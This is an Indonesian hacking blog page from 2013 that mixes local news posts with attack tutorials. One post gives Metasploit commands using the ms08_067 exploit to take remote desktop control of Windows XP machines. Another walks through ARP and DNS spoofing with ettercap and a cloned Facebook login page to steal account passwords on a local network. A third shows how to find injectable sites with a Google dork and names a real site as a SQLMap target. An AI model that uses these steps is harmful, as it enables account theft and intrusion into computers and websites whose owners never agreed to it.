468x60 ads

Backtrack berevolusi menjadi KALI LINUX

Kalian sudah pada tau belom kalo Backtrack Releas ke 6 berganti lable name menjadi KALI LINUX, aneh si bagi orang indonesia karna KALI jauh dari image Penetrasi

Belajar Opensive Scurity Yuk.

” The Quieter you become, the more you are able to hear….. “

Black KALI LINUX

BELAJAR LINUX.blogspot.com info seputar LINUX, BACKTRACK,DAN HACKING TUTORIAL

BELAJAR LINUX4

BELAJAR LINUX4.

BELAJAR LINUX5

BELAJAR LINUX5.

Sunday, 31 March 2013

cara menggunakan Sqlmap backtrack


Introduction

Lo tau gak kalo semenjak kedatangan backtrack yang meng include tools SQLMAP di dalamnya ini sangat mempermudah para peretas dalam melancarkan aksinya. hanya dengan beberapa instruksi maka sqlmap sudah bisa menjalankan teknik manual kita yaitu sql injection level 3, dari segi durasi tentunya lebih hemat kan.. ok cekidot ..

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystemcommand.
Refer to the wiki for an exhaustive breakdown of the features.

Download

You can download the latest tarball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
demo lihat disini : http://sqlmap.org/

Friday, 29 March 2013

Berita kecelakaan di tol TB Simatupang 2013-03

berita terkini akhirpekan ini Sebuah mobil sedan jenis Camry hitam bernopol B 1596 KV mengalami kecelakaan tunggal di Tol TB Simatupang dini hari tadi. Dua orang yang berada dalam mobil nahas tersebut tewas. 

"Iya, keduanya tewas. Sopir dan penumpang," ujar Kasat Lantas Polres Jaksel AKBP Hindarsono saat dihubungi, Sabtu (30/3/2013). 

Hindarsono mengatakan dua orang yang tewas diketahui bernama Yassir Luthfi Marfadi (31) sebagai sopir, dan Winda Anggraini (25). 

Kecelakaan tersebut terjadi pukul 04.00 WIB dini hari tadi. Kecelakaan terjadi di Km 25.400 arah Pasar Rebo. Polisi masih menelusuri kasus kecelakaan tersebut.

Wednesday, 27 March 2013

Berita Menolak Dipenjara Tapi Nongol di PBB, Susno Harus Segera Dieksekusi


Terpidana kasus korupsi Susno Duadji, mangkir dari panggilan eksekusi kejaksaan sebanyak 3 kali. Susno tiba-tiba hadir saat bergabung dengan salah satu partai politik.

Wakil Ketua Komisi III DPR Al Muzammil Yusuf, meminta kejaksaan segera menjalankan kewenangannya.

"Kejaksaan punya wewenang (menindaklanjuti mangkirnya Susno) dan mereka punya aparat untuk melaksanakan itu. Apakah akan panggil paksa atau apa itu kewenangan kejaksaan," kata Al Muzammil Yusuf saat berbincang dengan detikcom, Kamis (28/3/2013).

Kejaksaan diminta menjalankan wewenangnya dalam menghadapi terdakwa yang mangkir. Kalau ternyata ada alasan lain yang menyebabkan Susno tak hadir maka bisa disampaikan baik secara hukum ke kejaksaan atau politik ke DPR.



"Dialog saja pengacara dengan kejaksaan apa masalahnya. Kalau pihak pengacara ada komplain secara politik kami membuka untuk laporkan kepada kami. Kami mengetahui masalah ini," ungkapnya.

"Jadi kalau soal jemput paksa itu soal kejaksaan, tapi kalau setelah jemput paksa ada komplain bisa lapor kepada kita," lanjut politisi PKS itu.

Sebelumnya terpidana korupsi penanganan perkara PT Salmah Arwana Lestari (SAL) dan dana penanganan pilkada Jabar tahun 2008 Susno Duadji, mangkir dari panggilan kejaksaan. Jenderal polisi itu malah terlihat muncul bergabung dengan Partai Bulan Bintang (PBB) pada Rabu (27/3) kemarin


coursey by : detik

Sunday, 24 March 2013

Berita Pemerintah membuat peraturan Ecommerce harus domain co.id

       Halo kali ini saya mereview Berita tentang Pemerintah yang membuat peraturan Ecommerce harus menggunakan domain co.id, beritanya sih gitu tp jangan hawatir banyak yang gak setuju kok karena tau sebdiri domain co.id harus punya ijin ini itu yang buat males ecommerce menengah kebawah.

      Ya bayangin aja lagi pula emangnya kita mau apah cuma bersaing di pasar local.. padahal internet peluang globalnya luas banget, so menurut gw masih kurang baik lah cara seperti ini , mendingan e commerce nya aja yg di review satu persatu .



Thursday, 21 March 2013

Hacking Tutorial : Remote Desktop xp

Kembali lagi belajar TUTORIAL HACKING bersama belajar linux,kali ini mau ngasih tau cara meremote desktop windows XP menggunakan Backtrack.

oke langsung aja open termial BACKTRACK kamu
ctrl + t

---------------------------------------------------------
~#: msfconsole

msf> use exploit/windows/smb/ms08_067_netapi                  
msf > set PAYLOAD windows/vncinject/bind_tcp                

msf> set LHOST [IP KAMU]                                              
msf> set RHOST [IP TARGET]                                           
msf> exploit                                                                          

silahkan dipergunakan dengan bijak

Penulis tidak bertanggung jawab atas kerugian apapun ok..


Berita Kebakaran di Gedung Setneg

Berita Terbaru : Kebakaran di Gedung Setneg


Berita Kebakaran di Gedung Setneg di JAKARTA - Sekertaris Jenderal (Sekjen) Majelis Kedaulatan Rakyat Indonesia (MKRI) Adhie Massardi menduga api yang melahap lantai 3 gedung Sekertariat Negara (Setneg) memiliki kemiripan dengan kebakaran Bank Indonesia (BI) di era orde baru.

Menurutnya, pada saat kebakaran Gedung BI saat itu sedang mencuat pengusutan kasus Bantuan Likuiditas Bank Indonesia (BLBI). Namun, lokasi dimana terdapat dokumen yang menyimpan data BLBI malah terbakar dan diduga sebagai upaya penghilangan bukti yang ada.

Kebakaran di BI itu karena ingin menghilangkan bukti yang ada. Kemungkinan, kebakaran yang terjadi di Setneg juga untuk menghilangkan bukti, diantaranya bukti kasus bailout Bank Century,” kata Adhie kepada Okezone, Jumat (22/3/2013)

Apalagi, sambung Adhie, di Setneg itu diperkirakan ada Peraturan Pemerintah Pengganti Undang-undang (Perpu) No. 4 Tahun 2008 tentang bailout Bank Century senilai RP6,7 triliun. Hal ini mengindikasikan kemiripan yang sama dan diduga ada unsur kesengajaan. “Kalau ini benar ada unsur kesengajaan. Ini bukti kalau SBY sudah mulai panik,“ imbuhnya.

Selain itu, mantan Juru Bicara Presiden di era Abdurrahman Wahid (Gus Dur) ini juga menyayangkan pernyataan pihak Setneg yang menyebut bila tidak ada dokumen penting yang terbakar. Mengingat, pernyataan itu dilontarkan ketika olah Tempat Kejadian Perkara (TKP) masih terus dilakukan oleh tim Puslabfor Mabes Polri. “Saya heran, kenapa Setneg mengatakan tidak ada dokumen yang terbakar. Bagaimana dia bisa tahu tidak ada dokumen yang terbakar sebelum melakukan pengecekan,” ujarnya.

Sebelumnya, lantai 3 Gedung Setneg ludes terbakar pada Kamis 21 Maret 2013 sekira pukul 17.30 WIB. Pihak Setneg sendiri membantah jika kebakaran dikarenakan sabotase, dari dugaan sementara api berasal dari korsleting listrik.

Lantai 3 Setneg sendiri hanya ruang rapat yang tidak berisi dokumen-dokumen penting.

dikutip dari : okezone

Wednesday, 20 March 2013

lucu : post 1

Lucu banget bener - bener true storry
Dan gw sangat hoby baca gambar2 seperti ini malah kemaren gw sempet coba bikin sendiri untuk  diri gw sendiri foto dari foto orang2 sekitar gw, dan it's SOOOOOOO FUUUNN brooo.. TRY it..!!


Tuesday, 19 March 2013

cara FMITM Hacking Account | Facebook

cara FMITM Hacking Account Facebook, Ada banyak sekali cara melakukan peretasan akun facebook. Cara yang sedang populer adalah menggunakan social engineering attack. Penggunaan social engineering sendiri, mengandalkan kecerobohan korban, agar korban masuk ke dalam jebakan peretas. Cara ini yang paling ampuh, karena tidak ada patch untuk kebodohan manusia. Kali ini saya tidak memberikan tutorial social engineering attack, karena saya tidak expert dalam masalah social engineering, melainkan dengan menggunakan metode saya sendiri. Saya menyebutnya dengan Fisher Man In The Middle. 

konsepnya ::

Konsepnya adalah menggabungkan MITM attack dengan fake login attack. Saya mengkloning halaman login facebook, kemudian memodifikasi script login dan menempatkannya pada localhost. Mengapa localhost? IP local lebih cocok dalam melakukan spoofing attack pada metode MITM. Selain itu, membuat domain lebih sulit dan repot ketimbang menggunakan mesin sendiri sebagai server. Setelah membuat halaman login, saya menjalankan metode MITM dengan ettercap, dan melakukan spoofing attack. Sehingga semua user dalam localhost, akan di-redirect menuju IP address saya, dimana IP address saya menuju ke port 80 dan fake login saya sudah siap melakukan tugasnya.


Kelebihan :

FMITM tidak membutuhkan file dan web hosting
Dalam prakteknya FMITM dapat menjaring lebih dari 3 user account dalam waktu kurang dari 10 menit.
Cara ini nyaris tidak dapat dihindari, karena metode MITM yang dipakai.


MITM [DNS Spoofing]


Victim -> Packet [Bring me to google] -> Access Point
Victim <- Packet [Google] <- Access Point


Diatas, menunjukan sesaat sebelum terjadinya spoofing attack yang dilakukan oleh attacker. Dimana korban mengirim paket berisi "bawa saya menuju google", paket ini dikirim kepada access point. Kemudian access point mendapat packet dari korban, sebagai respon, access point akan menghubungkan korban kepada google.


Victim -> Packet [Bring me to google] -> FMITM aka attacker [Modifying Packet] -> Packet [Bring me to IP attacker] -> Access Point
Victim <- Packet [IP attacker] <- FMITM aka attacker [Forwarding Packet] <- Packet [IP attacker] Access Point


Sementara alur diatas menjelaskan FMITM attack.

Korban mengirim paket kepada access point (AP), paket berisi "Tolong bawa saya ke google"
Attacker mengambil paket, dan memodifikasinya (inject packet with poison). Paket diubah menjadi "Bawa saya ke IP attacker".
Paket yang telah dimodifikasi oleh Attacker dikirim ke AP.
AP menerima paket, sebagai respon AP mengirim pake balasan dengan isi "IP attacker"
Packet tersebut kembali di-intercept oleh attacker, kali ini attacker tidak memodifikasi paket. Melainkan hanya meneruskan packet tersebut kepada korban.
Korban menerima paket, dan menuju ke IP attacker
Attacker telah menjalankan service HTTPD, sehingga ketika korban menuju IP address attacker, korban akan melihat halaman index milik attacker. Halaman index attacker telah diubah oleh attacker, sehingga halaman ini dapat melakukan aksi pishing.


Mengapa MITM?
Aksi MITM dapat membuat korban menuju fake login page, KEMANAPUN korban mencoba pergi. Dan metode ini tidak mengubah URL korban, sehingga tidak menimbulkan kecurigaan.


Mengapa Fake Login?
Fake login adalah paduan yang cocok dengan metode MITM, mengingat SET milik dave_rel1k masih menerima service cookie. Sehingga terjadi kecacatan dalam output hasil pancingan.


Preparation :

ettercap (dapat ditemukan pada backtrack)
apache (dapat ditemukan pada backtrack)
Fake login script (dapat di download di web resminya "cari aja di google banyak kok)
Note : password archive adalah "red-dragon" (tanpa tanda kutip)


EULA (End User License Agreement)
Tutorial ini ditulis dengan tujuan edukasi, panyalah gunaan skill yang terdapat dalam tutorial ini, adalah tanggung jawab pembaca.


Walktrough
1. Setting Up Ettercap


Ketahuilah IP address anda, ini hal paling dasar dalam melakukan FMITM. Anda juga harus memperhatikan lewat mana anda menyerang. MITM hanya berlaku pada localhost, jika anda menggunakan modem, anda tidak bisa melakukan hal ini lebih jauh. Jika anda menggunakan kabel LAN, maka anda menggunakan interface eth0. Jika anda menggunakan jaringan nirkabel (wifi), maka anda menggunakan interface wlan0. Untuk mengecek IP address, anda dapat menggunakan perintah:

Command :
<< back|track 5 R2 [~] ifconfig vmnet8 | grep "inet addr:" | awk -F ":" '{print $2}' | sed s/"  Bcast"//g


Kali ini saya menggunakan Virtual OS untuk menguji keberhasilan metode saya. Hal ini bertujuan agar tidak ada pihak yang dirugikan selama pembuatan tutorial ini. Virtual OS saya menggunakan network adapter NAT, dimana Virtual OS saya dapat menggunakan internet JIKA backtrack saya memiliki akses internet. Saya menggunakan Windows XP Service Pack 2, berbahasa Inggris selama pengujian metode ini.


IP address saya adalah 10.10.2.1. Selanjutnya saya akan menaruh IP address ini pada config file dns spoof milik ettercap. Untuk dapat meng-input IP address ini, gunakan perintah
Command :
<< back|track 5 R2 [~] nano /usr/local/share/ettercap/etter.dns


Kemudian arahkan pointer keyboard pada akhir halaman, dan tambahkan:
Input :
* A [IP Address Anda]

Pengaturan seperti ini akan membuat korban dialihkan ke 10.10.2.1 KEMANAPUN korban pergi. Jika anda hanya ingin mengalihkan korban yang menuju youtube, maka.

Input :
*.youtube.com/* A [IP Address Anda]

Gunakan kemampuan bernalar anda sendiri dalam melakukan pengaturan file ettercap. Setelah selesai, tekan tombol ctrl+x kemudian tekan y, dan enter. File pengaturan anda berhasil tersimpan!

2. Mengatur fake login

Setelah mengunduh file dari link yang tersedia dalam persiapan di atas, copy semua file ke folder /var/www. Perlu diperhatikan. Anda harus mengubah ownership file ini menjadi milik www-data agar pishing dapat bekerja sebagaimana mestinya. Untuk mengecek ownership file, gunakan perintah
Command :
<< back|track 5 R2 [~] cd /var/www

Command :
<< back|track 5 R2 [/var/www] ls -l

Perhatikan, semua file ini milik root! Anda harus mengubah ownership file ini menjadi milik www-data dengan perintah
Command :
<< back|track 5 R2 [/var/www] chown www-data:www-data *

Kemudian cek kembali ownership file dengan perintah
Command :
<< back|track 5 R2 [/var/www] ls -l

Setelah file-file ini menjadi milik www-data. Maka selanjutnya kita akan menjalankan service apache, untuk menjalankan service apache, gunakan perintah:

Command :
<< back|track 5 R2 [/var/www] apache2ctl start
atau
Command :
<< back|track 5 R2 [/var/www] service apache2 start
atau
Command :
<< back|track 5 R2 [/var/www] /etc/ini.d/apache2 start
dan semua persiapanpun telah selesai.

3. FMITM in action

Sebelum memulai FMITM, saya akan membuktikan keberhasilan MITM dalam melakukan redirect ke IP address saya. Ini adalah screenshoot sebelum FMITM dilakukan:

Perhatikan command prompt. Perintah ping www.google.com menunjukan adanya balasan dari google, IP address ini milik google, dan ini wajar pada jaringan yang belum terserang MITM attack.

Kemudian saya jalankan perintah MITM dengan menggunakan etercap.

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE // // -P dns_spoof

Perhatikan kembali IP address anda, dan sesuaikan dengan perintah ettercap anda. Tanda // adalah target anda. // pertama menunjukan target 1, dan // kedua menunjukan target 2. Jika anda isi kosong, maka ettercap akan melancarkan serangan kepada semua IP address pada localhost, termasuk anda sendiri! Bagaimana jika anda hanya mengicar 1 orang?

Contoh:
Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]
Target 2 = 192.168.1.2

Maka perintah ettercap

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2/ -P dns_spoof

Bagaimana jika target 2 berjumlah lebih dari 1?

Contoh:
Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]
Target 2 = 192.168.1.2 dan 192.168.1.3
Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2,3/ -P dns_spoof

Dan ini adalah screenshoot ketika MITM terjadi

Perhatikan kembali command prompt. Pada perintah ping www.google.com yang ke dua, IP balasan bukanlah seperti IP address pada perintah ping pertama sebelum terjadinya MITM. IP balasan justru 10.10.2.1, dimana IP tersebut, adalah IP milik saya. Perhatikan juga URL pada Mozilla. URL menunjukan www.google.com, namun halaman berubah menjadi index localhost milik attacker. Monitoring selalu file hasil.txt dengan perintah


coursey by : www (dot) double-dragon(dot)blogspot(dot)com

Cara Exploit Database dengan SQLMap

Kali ini saya mau share tentang eksploitasi database bermodal SQLMAP di << back | track. Saat ini banyak sekali aplikasi web yang menggunakan database sebagai data manager, selain mudah dalam menganalogikanny dengan script PHP, database juga relatif mudah dioperasikan. Tapi database juga memiliki kelemahan dalam pertahanan dan sekuritasnya. Makanya eksploitasi database relatif mudah dilakukan.


Konsepnya adalah assessment, mapping, lalu auditing. Klasiknya dengan memanfaatkan Mantra untuk menjajal payload database yang kira-kira cocok. Mudahnya dengan menggunakan SQLMap untuk menentukan payload yang bisa digunakan untuk eksploitasi database.


Ribet ya? OK. Let's kicking ass!!! (seruan salah satu sesepuh tiger team "red-dragon")



Yang diperlukan:

SQLMap download di sini.Langkah pertama adalah memahami konsep SQL injection, untuk mempersingkat waktu, saya tidak akan menjelaskannya di sini. Secara garis besar, kamu harus memanfaatkan alamat web dengan embel-embel "blablabla.php?id=xx". Dimana "xx" adalah karakter unik yang merujuk pada sebuah database. Untuk mencari target URL seperti ini. Gunakan Google dork. Caranya, ketik ini pada Google search bar:


inurl:"php?id="


Lalu "Enter", dan beberapa website dengan embel-embel URL "php?id=" akan tampil. Pilih salah satu kemudian buka websitenya. Tekan CTRL + L lalu CTRL + C, ini berfungsi untuk mengkopi semua isi URL pada address bar. Lanjut, buka terminal, lalu ikuti modul berikut:

root@bt:~# cd /pentest/database/sqlmap/
root@bt : 
/pentest/database/sqlmap# ./sqlmap.py --help

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

Usage: python ./sqlmap.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)

Target:
At least one of these options has to be specified to set the source to
get target urls from.

-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
[snip...]
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
[snip...]



Setelah itu kita dapat mengetahui command dasar untuk menggunakan sqlmap, mulailah bereksplorasi (= Kali ini saya menggunakan website:


http://www(dot)esteler77(dot)com/product.php?subnav=14&subs=18


coursey by : www (dot) double-dragon(dot)blogspot(dot)com

install cURL di Linux



Menginstall CMS opencart di lokalhost Backtrack

kalo blom punya phpmyadmin,
install dulu yah, kalo apache dan mysql itu sudah ada di backtrack kalian
gausah repot2 tinggal

ketik di terminal

#apache2ctl start
#service mysql start

Opencart
ternyata membutuhkan extension cURL,,
pertama nyalain apache tuh perintah yg di
atas tadi



#apache2ctl start


terus install curl



#apt-get install php5-curl

#apt-get install curl libcurl3 libcurl3-dev php5-cur



lalu restart apache



#  /etc/init.d/apache2 restart




terus copy file cms OPENCARTNYA KE

/var/www



lalu beri permision dengan perintah



#chmod -R 777 [filename]/

buat database name

untuk konfigurasi
 -  buka dari browser
 :


localhost/lampp/phpmyadmin
bikin database namanya seterah akang2 aja


kemudian akses cms installasi di

localhost/[filename]

ikutin aja deh selanjutnya,,,




Twitter Delicious Facebook Digg Stumbleupon Favorites More